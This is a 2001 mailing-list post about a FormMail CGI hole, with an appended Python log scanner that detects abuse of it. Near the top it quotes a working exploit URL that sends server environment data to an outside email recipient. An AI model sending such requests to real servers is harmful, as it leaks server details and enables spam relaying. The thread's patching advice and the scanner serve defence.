
Re: [cobalt-users] CGI email



On Thu, 10 May 2001, Keith Davis wrote:

|Dan Kriwitsky wrote:
|
|> Checking what out? The exploit they published works.
|> Exploit:
|> http://www.example.com/cgi-bin/formmail.cgi?env_report=PATH&recipient=cache@
|> dowebs.com&required=&firstname=&lastname=&email=&message=&Submit=<message>
|> 
|
|Exactly my point. It's a feature that does indeed work. It's also a
|feature that can be turned off in at least 3 places in the script.
<snip>
|I just hate to see someone being told he has to install something else
|and tell his clients that they have to redo all those forms that they
|probably didn't understand the first time, when patching what he has
|will take only a few minutes.
|

Good view, Keith. I didn't take the time to see if there was a way to fix
this although I was sure that it was there, from my experience with CGI
scripts. But I like the change that I made to alienform... though I think
I might have some forms out there that still point to the old form mail
script.
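
Added example, not part of the original thread or of any script discussed in it: a small access-log check for forms that still point at an old formmail.cgi, flagging GET requests of the shape quoted above (a recipient outside your own domains, or env_report supplied in the URL). The allowlist and the log lines are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Assumption: domains this server's forms are allowed to mail to.
ALLOWED_RECIPIENT_DOMAINS = {"example.com"}

# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [10/May/2001:09:12:01 -0400] "POST /cgi-bin/formmail.cgi HTTP/1.0" 200 512
198.51.100.7 - - [10/May/2001:09:14:33 -0400] "GET /cgi-bin/formmail.cgi?env_report=PATH&recipient=someone@elsewhere.test&required=&message=hi HTTP/1.0" 200 734
192.0.2.44 - - [10/May/2001:09:20:10 -0400] "GET /cgi-bin/formmail.cgi?recipient=sales@example.com&subject=Quote HTTP/1.0" 200 498
203.0.113.5 - - [10/May/2001:09:25:47 -0400] "GET /index.html HTTP/1.0" 200 2048
"""

def check_line(line):
    """Return a list of reasons this log line looks like formmail abuse."""
    try:
        request = line.split('"')[1]            # e.g. GET /path?query HTTP/1.0
        _method, target, _proto = request.split(" ", 2)
    except (IndexError, ValueError):
        return []                               # malformed line: nothing to judge
    url = urlsplit(target)
    if not url.path.lower().endswith("/formmail.cgi"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    for value in params.get("recipient", []):
        for addr in value.split(","):           # tolerate several addresses
            addr = addr.strip()
            if not addr:
                continue
            domain = addr.rpartition("@")[2].lower()
            if domain not in ALLOWED_RECIPIENT_DOMAINS:
                reasons.append(f"recipient outside allowlist: {addr}")
    if "env_report" in params:
        reasons.append("env_report supplied in URL: " + ",".join(params["env_report"]))
    return reasons

def scan(log_text):
    """Map source IP -> reasons, for every suspicious line in the log."""
    findings = {}
    for line in log_text.splitlines():
        reasons = check_line(line)
        if reasons:
            findings.setdefault(line.split(" ", 1)[0], []).extend(reasons)
    return findings

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

POST bodies are not written to a standard access log, so this only sees parameters passed in the URL.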